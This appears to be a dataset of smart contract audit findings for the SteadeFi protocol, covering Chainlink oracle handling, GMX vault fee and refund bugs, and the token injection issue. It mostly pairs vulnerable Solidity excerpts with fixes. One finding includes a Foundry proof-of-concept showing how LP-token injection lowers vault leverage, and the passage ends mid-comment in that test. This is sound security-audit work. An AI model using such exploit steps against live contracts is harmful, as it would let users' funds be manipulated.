That a chainlink oracle works does not mean it will be supported by chainlink in the future and keeps working, and it could also be possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated, or removed, but the protocol prevents that.\\nThere is only one function inside ChainlinkARBOracle to update the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see it will only allow to set the price feed ones and revert if trying to update, or remove a price feed. Therefore, if chainlink changes something, or the owner accidentally set the wrong address, or the protocol no longer wants to support a price feed, it can not be removed, or updated.
Chainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\n
It is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check if it is a valid token when calling the oracle and the feed can not be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\n
```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n
Unhandled DoS when access to Chainlik oracle is blocked
low
In certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without a proper error handling.\\nSteadefi documentation gives special focus on Chainlink price feed dependency, (https://github.com/Cyfrin/2023-10-SteadeFi/tree/main "Additional Context"). The concern stems from the potential for Chainlink multisignature entities to deliberately block the access to the price feed. In such a situation, using the `latestRoundData` function could lead to an unexpected revert.\\nIn certain extraordinary situations, Chainlink has already proactively suspended particular oracles. To illustrate, in the case of the UST collapse incident, Chainlink chose to temporarily halt the UST/ETH price oracle to prevent the propagation of incorrect data to various protocols.\\nAdditionally, this danger has been highlighted and very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our current scenario:\\n"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n
Unhandled DoS when access to Chainlik oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.
In the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.
```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n
`Compound()` will not work if there is only TokenA/TokenB in the trove.
medium
The compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.
To mitigate this issue, it is important to always check if either tokenA/tokenB or ARB is present in the trove. If either of these is present, then proceed with the compound action. Otherwise, return.\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this) > 0 || self.tokenB.balanceOf(address(this)) ) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
If the compounding doesn't happen this could lead to the indirect loss of funds to the user and loss of gas for the keeper who always calls this function just to transfer tokens and check the balance of ARB.
```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
Positions may be liquidated due to incorrect implementation of Oracle logic
medium
Steadefi checks for historical data to make sure that last price update are within maximum delya allowed and in the range of maximum % deviation allowed.\\nBut checking the historical data is incorrect according to the chainlink docs which can damage some serious logic with in the protcol\\nVault calls ChainlinkARBOracle.consult(token) to get the fair price from chainlink oracle\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an interval function `_getPrevChainlinkResponse()` and try to fetch previous roundId price and other details\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is incorrect way of fetching historical data. chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nso it is not mendatory that there will be valid data for currentRoundID-1. if there is not data for currentRooundId-1 then `_badPriceDeviation(currChainlinkResponse,PrevResponse)` check here will return true. Hence vault won't able to get the price of token at some specific times
Positions may be liquidated due to incorrect implementation of Oracle logic\\nAs chainlink docs says. Increase in roundId may not be monotonic so loop through the previous roundID and fetch the previoous roundId data\\npseudo code\\n```\\n iterate (from roundId-1 to untill we get previous first data corressponding to roundID){\\n if(data present for roundID){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\n
In worse case keeper won't able to get the price of token so rebalancing , debt repay won't be possible leading to liquidation breaking the main important factor of protocol\\nAlmost 70% of vault action is dependent on price of a token and not getting price will make them inactive affecting net APR
```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n
Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy Vaults
high
The Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2. A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the initial user who called withdraw instead of the keeper.
The `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n
This flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepers
```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n
Users withdraw more assets than should when `mintFee` was called long ago
high
The amount of LP-tokens to withdraw is calculated at the `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than should be at the current timestamp. The longer the period since the last `mintFee` was called the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhile withdrawal amount of LP-token can be calculated with outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.
Users withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.
Users can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.\\nTools used\\nManual Review
```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n
Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification
medium
The protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.
Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n self.vault.mintFee();\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n
The impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.
```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n
Token injection leads to unintended behavior of vault
medium
When a token is deposited/withdrawn in a vault, it happens in two steps. In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log("debtAmtTokenBBefore: %s", debtAmtTokenBBefore);\\n console.log("debtAmtTokenBAfter: %s", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\n
In the deposit function, the depositValue should be used to determine approximately how many lpTokens GMX will be transferred to the vault. This number should then be compared to the actual received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.
Since, if this bug is exploited during deposit, an attacker can decrease the leverage, it results in users of the vault having less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.
```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was 